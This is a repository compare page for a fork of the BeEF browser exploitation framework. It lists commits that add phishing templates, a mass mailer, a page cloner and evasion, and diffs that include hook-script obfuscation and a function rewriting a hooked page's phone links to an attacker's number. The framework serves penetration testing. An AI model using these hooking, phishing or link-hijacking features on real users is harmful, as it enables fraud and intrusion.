Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.6
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.3.7
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

53 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
antisnatchor
69c59bb427 Social Eng. extension: moved the extension config line in main config file. 2012-09-07 17:21:17 +01:00
antisnatchor
4218f44203 Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 17:18:04 +01:00
bcoles
384fe7bcab Fix issue #741 2012-09-07 23:00:24 +09:30
bcoles
8625452751 Add support for Firefox 15 2012-09-07 20:30:19 +09:30
antisnatchor
0dd06d6ecb Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 08:41:13 +01:00
antisnatchor
5fc56a9dfa Social Eng. extension: added stub for mass_mailer DB structure 2012-09-07 08:41:02 +01:00
antisnatchor
6ac074d2b0 Social Eng. extension: now the web_cloner can serve modified pages as well. This is needed when the page use custom logic to submit the form. Added an example of an Edf Energy modified page. 2012-09-06 12:37:26 +01:00
antisnatchor
b3ae5f1016 Social Eng. extension: added EDG Energy template configuration in config.yaml 2012-09-06 11:30:33 +01:00
antisnatchor
64ba4686f4 Social Eng. Extension: added EDF Energy phishing template :D 2012-09-06 11:27:12 +01:00
antisnatchor
2f5fc46a8e Social Eng. Extension: fixed a bug in mass_mailer when choosing a different template. 2012-09-06 11:26:31 +01:00
Michele Orru
45b839d970 Merge pull request #740 from gallypette/master 
Simple_hijacker module (Social engineering): Awesome, merging it straight away ;)
 2012-09-06 02:07:42 -07:00
bcoles
085f2775f3 Added beef.browser.hasCors() function 2012-09-06 17:50:27 +09:30
Jean-Louis Huynen
716e7fe712 Change stupid code that made this module unusable with the API to something less stupid (i hope) 2012-09-05 15:16:21 +02:00
Jean-Louis Huynen
05d7fe3adf Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code) 2012-09-04 17:47:59 +02:00
qswain2
931aeb6ee5 Fixed the module count in the ui to include sub modules (issue 708) 2012-09-03 09:46:03 -04:00
antisnatchor
31387a0aa6 Social Eng. extension: massmailer -> calling IO.popen in a secure way 2012-09-02 19:00:40 +01:00
antisnatchor
d881852216 Social Eng. extension: added notes about 'wget' and 'file' commands required for the extension. 2012-09-02 17:26:38 +01:00
antisnatchor
ed9b1d5c2e Social Eng. Extension: webcloner ->calling IO.popen in a secure way 2012-09-02 17:25:50 +01:00
antisnatchor
ae72f9fedf Social Eng. extension: added request.ip to interceptor logs, adapted output 2012-09-02 16:23:53 +01:00
bcoles
ab588c0f68 Add link_rewrite_tel module 
Fixes issue #721
 2012-09-02 16:58:43 +09:30
antisnatchor
8eb0e2d973 Social Eng. Extension: Added DB structure and logic for web_cloner and interceptor. 2012-09-01 15:15:30 +01:00
Michele Orru
01ea6e4a04 Merge pull request #737 from gallypette/master 
Added Whitespace Evasion technique!
 2012-08-31 07:32:46 -07:00
antisnatchor
9b1cae6790 Added social_engineering extension to main BeEF config file. 2012-08-31 15:22:09 +01:00
antisnatchor
6b5302ef21 Social Eng. Extension: Added RESTful API calls for both mass_mailer and web_cloner 2012-08-31 14:08:08 +01:00
antisnatchor
a6a9af8483 Minor changes to main Server class (mounts need to be an instance variable) 2012-08-31 14:07:33 +01:00
antisnatchor
9ea0f60138 Social Eng. extension: added default PDF attachment to config.yaml 2012-08-29 22:48:45 +01:00
antisnatchor
6409b3d98f Social Eng. extension: mount point for phishing page is not configurable, refactored Interceptor initialization using config settings 2012-08-29 22:36:24 +01:00
antisnatchor
26c7696e0f Social Eng. extension: if the page can be framed, load it in an overlay iFrame maintaining the hook :D 2012-08-29 21:08:07 +01:00
antisnatchor
0260181d33 Social Eng. extension: added redirection after POST interception, refactored Interceptor class 2012-08-29 19:33:14 +01:00
antisnatchor
20d2e17232 Social Eng. extension: added support for SMTP servers that do not require authentication 2012-08-29 17:50:14 +01:00
antisnatchor
92b2382e25 Social Eng. extension: added support to specify attachments, added automatic MIME type guessing 2012-08-29 17:38:37 +01:00
Jean-Louis Huynen
e86712413c modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :) 2012-08-29 18:22:22 +02:00
Jean-Louis Huynen
788cef08d3 add whitespace obfuscation technique - should work in theory - but does not in practice 2012-08-29 13:54:26 +02:00
antisnatchor
ffbd3d65b9 Social Eng. extension: various fixes, link/linktext/fromname configurable, adjusted various email headers 2012-08-27 21:30:09 +01:00
antisnatchor
df056fb688 Social Eng. extension: added configurable email templates 2012-08-27 16:10:40 +01:00
antisnatchor
26c86951a4 Social Eng. extension: added mass mailer 2012-08-27 14:30:10 +01:00
antisnatchor
558ca03ef6 Social Eng. extension: added basic structure and web cloner 2012-08-27 10:28:03 +01:00
antisnatchor
42c348f3f2 Added timeout.js that calls beef_init an fix some nasty cross-domain hooking issues when the hooking process was not started. 2012-08-25 10:26:16 +01:00
antisnatchor
b6c12fd0f3 Added copyright to are.js 2012-08-25 10:25:31 +01:00
bcoles
57f68725bc Moved lcamtuf download module to social engineering category 2012-08-25 18:54:15 +09:30
antisnatchor
50e7a1c206 Refactored WebSocket code. 2012-08-25 10:18:56 +01:00
antisnatchor
5400696c40 Refactored and modified beefjs.rb: splitted external lib files from beef files, added the feature for #734 to exclude some core lib js files (like jquery) from obfuscation 2012-08-25 09:58:25 +01:00
antisnatchor
7ed9516b53 Obfuscation: removed base64 from the default chain list, added excluded_core_js option 2012-08-25 09:55:53 +01:00
antisnatchor
aeb17e7d7a Changed target support to notify_all for lcamtuf download module (pop-up blockers) 2012-08-24 19:46:02 +01:00
bmantra
7c26ac6a1e Merge pull request #735 from bmantra/master 
fixes #725 initial commit for lcamtuf download trick module
 2012-08-24 11:27:25 -07:00
bmantra
f852ca26cb lcamtuf download module 2012-08-24 20:24:37 +02:00
Mike Haworth
5a9a050c1c added new phonegap modules, to check connection type (wifi/3g) and ensure beef hook survives suspend resume of app. 2012-08-22 20:51:49 +12:00
Mike Haworth
ad2bc95cf0 updated local file theft to accept custom file path 2012-08-22 20:50:03 +12:00
Mike Haworth
f2d4a88810 added abilty to detect new phonegap renamed 'cordova' 2012-08-22 20:48:55 +12:00
Wade Alcorn
6897962803 Version updated 2012-08-15 13:39:16 +10:00
sussurro
8c43fffb36 Fixed Twitter client to not cause errors on failed tweets allowing logins etc to continue 2012-08-12 19:27:19 -07:00
radoen
93bb25aa0b Set to false websocket and https 2012-08-10 13:47:42 +02:00
radoen
5697eac123 Added support for wss, issue #714 2012-08-10 13:43:48 +02:00
66 changed files with 2954 additions and 168 deletions
Expand all files Collapse all files

3
.gitignore vendored
View File

@@ -1,3 +1,4 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
extensions/social_engineering/web_cloner/cloned_pages

2
VERSION
View File

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.6-alpha
0.4.3.7-alpha

11
beef
View File

@@ -81,7 +81,7 @@ Socket.do_not_reverse_lookup = true
case config.get("beef.database.driver")
when "sqlite"
DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
when "mysql","postgres"
when "mysql", "postgres"
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
@@ -124,12 +124,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
if config.get("beef.http.websocket.secure")
print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
end
end
# @note Call the API method 'pre_http_start'
BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
@@ -140,7 +141,7 @@ if config.get("beef.extension.console.shell.enable") == true
begin
FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
rescue Interrupt
end
else

27
config.yaml
View File

@@ -16,16 +16,16 @@
# BeEF Configuration file
beef:
version: '0.4.3.6-alpha'
version: '0.4.3.7-alpha'
debug: false
restrictions:
# subnet of browser ip addresses that can hook to the framework
# subnet of browser ip addresses that can hook to the framework
permitted_hooking_subnet: "0.0.0.0/0"
# subnet of browser ip addresses that can connect to the UI
# subnet of browser ip addresses that can connect to the UI
# permitted_ui_subnet: "127.0.0.1/32"
permitted_ui_subnet: "0.0.0.0/0"
http:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
@@ -42,8 +42,9 @@ beef:
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
secure: false # use WebSocketSecure
port: 61985 # good success rate through proxies
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
@@ -68,7 +69,7 @@ beef:
# db_file is only used for sqlite
db_file: "beef.db"
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_name: "beef"
@@ -86,13 +87,15 @@ beef:
# You may override default extension configuration parameters here
extension:
requester:
enable: true
enable: true
proxy:
enable: true
enable: true
metasploit:
enable: false
console:
shell:
enable: false
social_engineering:
enable: false
evasion:
enable: false
console:
shell:
enable: false

16
core/main/client/are.js
View File

@@ -1,4 +1,18 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.are = {
init:function(){
var Jools = require('jools');

31
core/main/client/browser.js
View File

@@ -188,12 +188,20 @@ beef.browser = {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/14\./) != null;
},
/**
* Returns true if FF15
* @example: beef.browser.isFF15()
*/
isFF15: function() {
return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function() {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15();
},
/**
@@ -463,6 +471,7 @@ beef.browser = {
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF14: this.isFF14(), // Firefox 14
FF15: this.isFF15(), // Firefox 15
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -526,6 +535,7 @@ beef.browser = {
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isFF13()) { return '13' }; // Firefox 13
if (this.isFF14()) { return '14' }; // Firefox 14
if (this.isFF15()) { return '15' }; // Firefox 15
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -605,8 +615,8 @@ beef.browser = {
* Checks if the Phonegap API is available from the hooked domain.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasJava()) { ... }
*/
* @example: if(beef.browser.hasPhonegap()) { ... }
*/
hasPhonegap: function() {
var result = false;
try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +624,21 @@ beef.browser = {
return result;
},
/**
* Checks if the browser supports CORS
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.hasCors()) { ... }
*/
hasCors: function() {
if ('withCredentials' in new XMLHttpRequest())
return true;
else if (typeof XDomainRequest !== "undefined")
return true;
else
return false;
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.

25
core/main/client/dom.js
View File

@@ -194,6 +194,31 @@ beef.dom = {
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param: {String} new_number: the new link telephone number to be written
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]

26
core/main/client/timeout.js Normal file
View File

@@ -0,0 +1,26 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).
To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor
*/
setTimeout(beef_init, 1000);

19
core/main/client/websocket.js
View File

@@ -27,15 +27,18 @@ beef.websocket = {
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var protocol = "ws://";
if(webSocketSecure)
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
@@ -43,10 +46,10 @@ beef.websocket = {
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.alive();
}

239
core/main/handlers/modules/beefjs.rb
View File

@@ -14,126 +14,151 @@
# limitations under the License.
#
module BeEF
module Core
module Handlers
module Modules
module Core
module Handlers
module Modules
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# @note Purpose: avoid rewriting several times the same code.
module BeEFJS
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beefjs = ''
# @note location of sub files
beefjs_path = "#{$root_dir}/core/main/client/"
# @note we load websocket library only if ws server is enabled in config.yalm
# check in init.js
if config.get("beef.http.websocket.enable")
# Builds the default beefjs library (all default components of the library).
# @param [Object] req_host The request object
def build_beefjs!(req_host)
config = BeEF::Core::Configuration.instance
# @note set up values required to construct beefjs
beef_js = ''
# @note location of sub files
beef_js_path = "#{$root_dir}/core/main/client/"
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js)
else
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js)
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == false
# @note BeEF libraries: need Eruby evaluation and obfuscation #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
else #antisnatchor: leave timeout.js as the last one!
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
end
end
ext_js_to_obfuscate = ''
ext_js_to_not_obfuscate = ''
# @note construct the beefjs string from file(s)
js_sub_files.each {|js_sub_file_name|
js_sub_file_abs_path = beefjs_path + js_sub_file_name
beefjs << (File.read(js_sub_file_abs_path) + "\n\n")
}
# @note If Evasion is enabled, the final ext_js string will be ext_js_to_obfuscate + ext_js_to_not_obfuscate
# @note If Evasion is disabled, the final ext_js will be just ext_js_to_not_obfuscate
ext_js_sub_files.each{ |ext_js_sub_file|
if config.get("beef.extension.evasion.enable")
if config.get("beef.extension.evasion.exclude_core_js").include?(ext_js_sub_file)
print_debug "Excluding #{ext_js_sub_file} from core files obfuscation list"
# do not obfuscate the file
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
else
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
else
# Evasion is not enabled, do not obfuscate anything
ext_js_sub_file_path = beef_js_path + ext_js_sub_file
ext_js_to_not_obfuscate << (File.read(ext_js_sub_file_path) + "\n\n")
end
}
# @note create the config for the hooked browser session
# @note construct the beef_js string from file(s)
beef_js_sub_files.each { |beef_js_sub_file|
beef_js_sub_file_path = beef_js_path + beef_js_sub_file
beef_js << (File.read(beef_js_sub_file_path) + "\n\n")
}
hook_session_name = config.get('beef.http.hook_session_name')
hook_session_config = BeEF::Core::Server.instance.to_h
# @note create the config for the hooked browser session
hook_session_config = BeEF::Core::Server.instance.to_h
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_host="0.0.0.0" in config ini, use the host requested by client
if hook_session_config['beef_host'].eql? "0.0.0.0"
hook_session_config['beef_host'] = req_host
hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
end
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
hook_session_config['beef_port'] = hook_session_config['beef_public_port']
hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port'])
if hook_session_config['beef_public_port'] == '443'
hook_session_config['beef_url'].sub!(/http:/, 'https:')
end
end
end
# @note Set some WebSocket properties
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
end
# @note populate place holders in the beef_js string and set the response body
eruby = Erubis::FastEruby.new(beef_js)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end
# @note Return the final hook to be sent to the browser
@body << @final_hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each { |k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
if config.get("beef.http.websocket.enable")
hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
end
# @note populate place holders in the beefjs string and set the response body
eruby = Erubis::FastEruby.new(beefjs)
@hook = eruby.evaluate(hook_session_config)
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
end
@body << @hook
end
# Finds the path to js components
# @param [String] component Name of component
# @return [String|Boolean] Returns false if path was not found, otherwise returns component path
def find_beefjs_component_path(component)
component_path = component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
return false if not File.exists? component_path
component_path
end
# Builds missing beefjs components.
# @param [Array] beefjs_components An array of component names
def build_missing_beefjs_components(beefjs_components)
# @note verifies that @beef_js_cmps is not nil to avoid bugs
@beef_js_cmps = '' if @beef_js_cmps.nil?
if beefjs_components.is_a? String
beefjs_components_path = find_beefjs_component_path(beefjs_components)
raise "Invalid component: could not build the beefjs file" if not beefjs_components_path
beefjs_components = {beefjs_components => beefjs_components_path}
end
beefjs_components.keys.each {|k|
next if @beef_js_cmps.include? beefjs_components[k]
# @note path to the component
component_path = beefjs_components[k]
# @note we output the component to the hooked browser
@body << File.read(component_path)+"\n\n"
# @note finally we add the component to the list of components already generated so it does not get generated numerous times.
if @beef_js_cmps.eql? ''
@beef_js_cmps = component_path
else
@beef_js_cmps += ",#{component_path}"
end
}
end
end
end
end
end
end

150
core/main/network_stack/websocket/websocket.rb
View File

@@ -27,17 +27,156 @@ module BeEF
@@activeSocket= Hash.new
@@lastalive= Hash.new
@@config = BeEF::Core::Configuration.instance
#@@wsopt=nil
MOUNTS = BeEF::Core::Server.instance.mounts
def initialize
port = @@config.get("beef.http.websocket.port")
secure = @@config.get("beef.http.websocket.secure")
@root_dir = File.expand_path('../../../../../', __FILE__)
if (secure)
ws_secure_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.secure_port"), :secure => true,
:tls_options => {
:private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
:cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
}
}
# @note Start a WSS server socket
start_websocket_server(ws_secure_options, true)
end
# @note Start a WS server socket
ws_options = {:host => "0.0.0.0", :port => @@config.get("beef.http.websocket.port")}
start_websocket_server(ws_options,false)
# #Thread for websocket-secure
# Thread.new {
# port = @@config.get("beef.http.websocket.secure_port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port, :secure => true,
# :tls_options => {
# :private_key_file => @root_dir+"/"+@@config.get("beef.http.https.key"),
# :cert_chain_file => @root_dir+"/"+ @@config.get("beef.http.https.cert")
# }
# }
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket-secured channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket-secured - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket-secured - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
